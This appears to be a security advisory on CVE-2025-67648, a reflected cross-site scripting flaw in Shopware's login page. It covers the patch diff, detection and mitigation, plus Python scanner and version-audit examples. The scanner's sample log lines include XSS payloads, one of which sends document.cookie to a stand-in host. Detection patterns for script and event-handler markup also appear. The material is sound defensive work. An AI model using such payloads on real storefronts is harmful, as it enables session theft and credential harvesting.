CVE-2025-67648 Overview
CVE-2025-67648 is a Reflected Cross-Site Scripting (XSS) vulnerability in Shopware, an open commerce platform. The flaw resides in AuthController.php, where the waitTime request parameter from the login page URL is rendered directly into the Storefront login Twig template without input validation. An attacker can inject malicious script content through the URL parameter, which executes in the browser of any victim who clicks a crafted link. The vulnerability affects Shopware versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0. Fixes are available in versions 6.6.10.10 and 6.7.5.1. The issue is tracked under [CWE-79].
Critical Impact
Attackers can execute arbitrary JavaScript in a victim's browser within the storefront origin. Because the payload runs on the login page itself, it can overlay or rewrite the form to harvest credentials as they are typed, deface the page, or issue authenticated requests with the victim's existing storefront session. Whether the session cookie can be read outright depends on its HttpOnly flag; script can still act on the victim's behalf without reading it. As a reflected flaw it requires each victim to open a crafted link, which is why reflected XSS is usually scored lower than the heading suggests.
Affected Products
- Shopware 6.4.6.0 through 6.6.10.9
- Shopware 6.7.0.0 through 6.7.5.0
- Shopware Storefront login component (AuthController.php)
Discovery Timeline
- 2025-12-11 - CVE-2025-67648 published to NVD
- 2026-03-17 - Last updated in NVD database
Technical Details for CVE-2025-67648
Vulnerability Analysis
The vulnerability stems from unsafe handling of user-controlled query string parameters on the Shopware Storefront login page. The AuthController read the waitTime, loginError, and errorSnippet values straight from the HTTP request with $request->get(), which consults route attributes first and then falls through to the query string and POST body, and passed them into the Twig template login.html.twig. The template rendered these values inside an alert component. waitTime is only ever meant to carry the remaining throttle countdown in seconds, yet nothing enforced a numeric type before it was interpolated into the translated message, so an attacker could substitute arbitrary HTML or JavaScript in the URL and the server reflected it in the rendered response.
Root Cause
The root cause is improper neutralization of input during web page generation [CWE-79]. The pre-patch controller called $request->get('waitTime') to pull values directly from the query string. The Twig template interpolated waitTime into a translated message and then ran the result through sw_sanitize in its default, non-strict mode. That mode is an HTML allowlist intended for rich content, its configuration is installation-specific, and it was the only barrier in this rendering path; on affected installations it did not strip the script-capable content that reached it. There was no numeric coercion or attribute-level validation before template interpolation.
Attack Vector
Exploitation requires user interaction. An attacker crafts a URL pointing to the Shopware login page (/account/login) with a malicious waitTime parameter and lures a victim to open it through phishing, malvertising, or a third-party site. When the victim loads the page, the injected payload executes in the context of the Shopware storefront origin, on the very page where the victim is about to type credentials. No authentication is needed to trigger the reflection, and because the login page is served on a plain GET, a single click suffices.
'redirectParameters' => $request->get('redirectParameters', json_encode([])),
'errorRoute' => $request->attributes->get('_route'),
'page' => $page,
- 'loginError' => (bool) $request->get('loginError'),
- 'waitTime' => $request->get('waitTime'),
- 'errorSnippet' => $request->get('errorSnippet'),
+ 'loginError' => $request->attributes->getBoolean('loginError'),
+ 'waitTime' => $request->attributes->get('waitTime'),
+ 'errorSnippet' => $request->attributes->get('errorSnippet'),
'data' => $data,
]);
}
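Review bot: `$request->attributes->get('waitTime')` returns null unless the failed-login path explicitly places that attribute on the forwarded request, whereas `$request->get()` looked in attributes first and then fell through to the query string and POST body; so this change only keeps the throttle countdown working (and only closes the hole) if the throttling code path forwards with attributes rather than redirecting with `?waitTime=`. Confirm that in the same change. Separately, the unchanged `'redirectParameters' => $request->get('redirectParameters', json_encode([]))` line above still reads user input; it is outside this fix, but its consumer should be checked to json-decode and validate it rather than echo it.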
// Source: https://github.com/shopware/shopware/commit/c9242c02c84595d9fa3e2adf6a264bc90a657b58
{% if errorSnippet != null %}
{% sw_include '@Storefront/storefront/utilities/alert.html.twig' with {
type: 'danger',
- content: errorSnippet|trans|sw_sanitize
+ content: errorSnippet|trans|sw_sanitize({}, true)
} %}
{% elseif waitTime != null %}
{% sw_include '@Storefront/storefront/utilities/alert.html.twig' with {
type: 'info',
- content: 'account.loginThrottled'|trans({'%seconds%': waitTime})|sw_sanitize
+ content: 'account.loginThrottled'|trans({'%seconds%': waitTime|number_format})|sw_sanitize
} %}
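Review bot: the two branches are now inconsistent: `errorSnippet` moved to strict `sw_sanitize({}, true)` while the `waitTime` branch keeps the default allowlist mode. `waitTime|number_format` already reduces the interpolated value to a formatted number (Twig casts its input to float, so a non-numeric string renders as 0), which is what closes the injection, but applying strict mode to both alerts would make the intent obvious and remove the dependency on the installation's sanitizer defaults. Note also that `errorSnippet|trans` returns the key unchanged when no translation exists, so an attacker-chosen value is still reflected as text; the strict sanitizer is what makes that harmless, so it must not be relaxed later.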
// Source: https://github.com/shopware/shopware/commit/c9242c02c84595d9fa3e2adf6a264bc90a657b58
Detection Methods for CVE-2025-67648
Indicators of Compromise
- Web server access logs containing requests to /account/login with a waitTime query parameter holding anything other than digits: percent-encoded markup such as %3C (<), %3E (>) or %22 ("), or the strings script, onerror, onload or javascript: after decoding. Access logs record the raw, still-encoded query string, so match on both forms.
- Referer headers pointing to external domains for traffic landing on the login page with suspicious query strings.
- Query strings on the login page that set loginError or errorSnippet at all: the patched code never reads these from the request, so client-supplied copies appear only in scanning or exploitation attempts. Failed logins are not a prerequisite for exploitation, so a burst of failed logins is at most corroborating context, not a required condition for an alert.
Detection Strategies
- Deploy a web application firewall (WAF) rule that blocks or flags requests to Shopware login routes where waitTime contains characters outside [0-9].
- Inspect HTTP request bodies and query strings for XSS payload signatures targeting waitTime, loginError, and errorSnippet parameters.
- Correlate browser-side Content Security Policy (CSP) violation reports with server request logs to identify reflected injection attempts.
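The indicators and detection strategies above, turned into a log scanner as an added example (this is not Shopware code and not part of the original advisory). It assumes combined-format access logs, a storefront host list of your own (SHOP_HOSTS), and the constructed sample lines embedded below; it flags /account/login requests whose waitTime is non-numeric or that carry loginError or errorSnippet from the client, and records whether the referer is external.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = r'''
203.0.113.10 - - [12/Dec/2025:10:01:02 +0000] "GET /account/login?waitTime=30 HTTP/1.1" 200 5120 "https://shop.example/account/login" "Mozilla/5.0"
203.0.113.11 - - [12/Dec/2025:10:01:05 +0000] "GET /account/login?waitTime=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 5234 "https://evil.example/lure" "Mozilla/5.0"
203.0.113.12 - - [12/Dec/2025:10:01:09 +0000] "GET /account/login?errorSnippet=%3Cscript%3Efetch('https://evil.example/'%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 5300 "-" "curl/8.0"
203.0.113.13 - - [12/Dec/2025:10:01:12 +0000] "GET /product/abc?waitTime=%3Cb%3E HTTP/1.1" 200 800 "-" "Mozilla/5.0"
203.0.113.14 - - [12/Dec/2025:10:01:15 +0000] "POST /account/login HTTP/1.1" 302 0 "https://shop.example/account/login" "Mozilla/5.0"
'''

# Combined log format: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

LOGIN_PATH = "/account/login"
SUSPECT_PARAMS = ("waitTime", "loginError", "errorSnippet")
NUMERIC = re.compile(r"^[0-9]*$")          # what a legitimate waitTime looks like
XSS_HINT = re.compile(r"<|>|javascript:|on[a-z]+\s*=", re.IGNORECASE)
SHOP_HOSTS = {"shop.example"}              # assumption: your own storefront host(s)


def classify(param, value):
    """Return a reason string if the decoded parameter value is suspicious, else None."""
    if param == "waitTime":
        if NUMERIC.match(value):
            return None
        reason = "non-numeric waitTime"
    else:
        # The patched controller never reads these from the query string, so a
        # client-supplied copy is at best noise and at worst an injection attempt.
        reason = f"{param} supplied via query string"
    if XSS_HINT.search(value):
        reason += " containing HTML/JS markup"
    return reason


def scan(log_text):
    """Scan access-log text and return a list of finding dicts, in log order."""
    findings = []
    for raw in log_text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        m = LOG_RE.match(raw)
        if not m:
            continue  # unparsable line; a production scanner would count these
        url = urlsplit(m["target"])
        if url.path != LOGIN_PATH:
            continue
        # parse_qs percent-decodes, so %3C becomes "<" before classification.
        params = parse_qs(url.query, keep_blank_values=True)
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer != "-" else None
        external = ref_host is not None and ref_host not in SHOP_HOSTS
        for param in SUSPECT_PARAMS:
            for value in params.get(param, []):
                reason = classify(param, value)
                if reason:
                    findings.append({
                        "ts": m["ts"],
                        "ip": m["ip"],
                        "param": param,
                        "value": value,
                        "reason": reason,
                        "referer": referer,
                        "external_referer": external,
                    })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r}: {f['reason']}"
              f" (external referer: {f['external_referer']})")
```

Only two of the five sample lines produce findings: the encoded waitTime payload with an external referer and the errorSnippet injection; the numeric waitTime, the non-login path and the POST without a query string are ignored. Run it over real logs with a simple `scan(open(path).read())`, and widen SHOP_HOSTS to every hostname the storefront answers on, or every legitimate same-site navigation will be reported as external.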
Monitoring Recommendations
- Enable verbose logging on the Shopware Storefront reverse proxy and forward to a central analytics platform.
- Monitor outbound DNS and HTTP requests from storefront sessions for unexpected callbacks to attacker-controlled domains.
- Track patch deployment across Shopware instances and alert when any production instance still runs 6.4.6.0 through 6.6.10.9 or 6.7.0.0 through 6.7.5.0. Compare versions component-wise, not as strings: lexically, "6.6.10.9" sorts after "6.6.10.10".
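A version audit that applies the affected ranges listed on this page, added here as an example (not Shopware tooling). The inventory of hosts and versions is constructed; the ranges are inclusive and taken from the advisory text above. It also shows why plain string comparison is the wrong tool for the job.

```python
# Affected ranges as stated in the advisory text above (inclusive bounds).
AFFECTED_RANGES = [
    ((6, 4, 6, 0), (6, 6, 10, 9)),
    ((6, 7, 0, 0), (6, 7, 5, 0)),
]

# Constructed inventory (hostname -> reported Shopware version), not real hosts.
SAMPLE_INVENTORY = {
    "shop-eu": "6.6.10.9",
    "shop-us": "6.7.5.0",
    "staging": "6.7.5.1",
    "legacy": "6.4.5.3",
}


def parse_version(text):
    """'6.6.10.9' -> (6, 6, 10, 9).

    Strips a leading 'v' and any pre-release suffix after '-', and pads to four
    components so that '6.7' compares like '6.7.0.0'. Raises ValueError on junk.
    """
    core = text.strip().lstrip("v").split("-", 1)[0]
    parts = tuple(int(p) for p in core.split("."))
    return parts + (0,) * (4 - len(parts))


def is_affected(text):
    """True if the version falls inside one of the affected ranges."""
    v = parse_version(text)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def recommended_fix(text):
    """Fixed release on the same branch, per the advisory: 6.6.10.10 or 6.7.5.1."""
    return "6.6.10.10" if parse_version(text) < (6, 7, 0, 0) else "6.7.5.1"


def audit(inventory):
    """Return one record per affected host, in inventory order."""
    return [
        {"host": host, "version": ver, "fix": recommended_fix(ver)}
        for host, ver in inventory.items()
        if is_affected(ver)
    ]


if __name__ == "__main__":
    # The string trap: lexically the vulnerable release sorts AFTER the fixed one.
    print("string compare says 6.6.10.9 < 6.6.10.10:", "6.6.10.9" < "6.6.10.10")
    print("tuple compare says:", parse_version("6.6.10.9") < parse_version("6.6.10.10"))
    for rec in audit(SAMPLE_INVENTORY):
        print(f"{rec['host']}: {rec['version']} is affected, upgrade to {rec['fix']}")
```

Feed it whatever your inventory source returns (a CMDB export, `composer show shopware/core` output collected by your config management), and gate deployments or raise an alert on a non-empty `audit()` result.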
How to Mitigate CVE-2025-67648
Immediate Actions Required
- Upgrade Shopware to version 6.6.10.10 or 6.7.5.1 as published in the GitHub Security Advisory.
- Audit web server logs for prior requests to /account/login with crafted waitTime, loginError, or errorSnippet parameters, and identify the client IPs and referers involved.
- Where a user appears to have loaded such a URL, invalidate their storefront session; if an administrator was targeted on the same origin, rotate administrative sessions and credentials as well.
Patch Information
Shopware released the fix in commit c9242c02c84595d9fa3e2adf6a264bc90a657b58. The patch moves waitTime, loginError, and errorSnippet values from query parameters to internal request attributes, applies number_format to coerce waitTime to a numeric value, and enables strict mode on sw_sanitize for errorSnippet. Full details are in the GitHub Security Advisory GHSA-6w82-v552-wjw2.
Workarounds
- Configure a WAF rule to reject requests to /account/login where waitTime is non-numeric until the patch is applied.
- Enforce a strict Content Security Policy that disallows inline scripts on storefront login pages to limit payload execution.
- Restrict access to the administration routes that share the storefront origin via IP allowlisting where feasible, so that script running on the storefront has less to reach.
# Example NGINX rule to block non-numeric waitTime parameters.
# $arg_waitTime holds the raw, still percent-encoded value, so "%3C" already
# fails the digit-only check; an empty or absent parameter passes through.
# "if" with a bare "return" is one of the safe uses of "if" inside "location".
# The upstream name shopware_backend is a placeholder for your own.
location /account/login {
    if ($arg_waitTime !~ "^[0-9]*$") {
        return 400;
    }
    proxy_pass http://shopware_backend;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.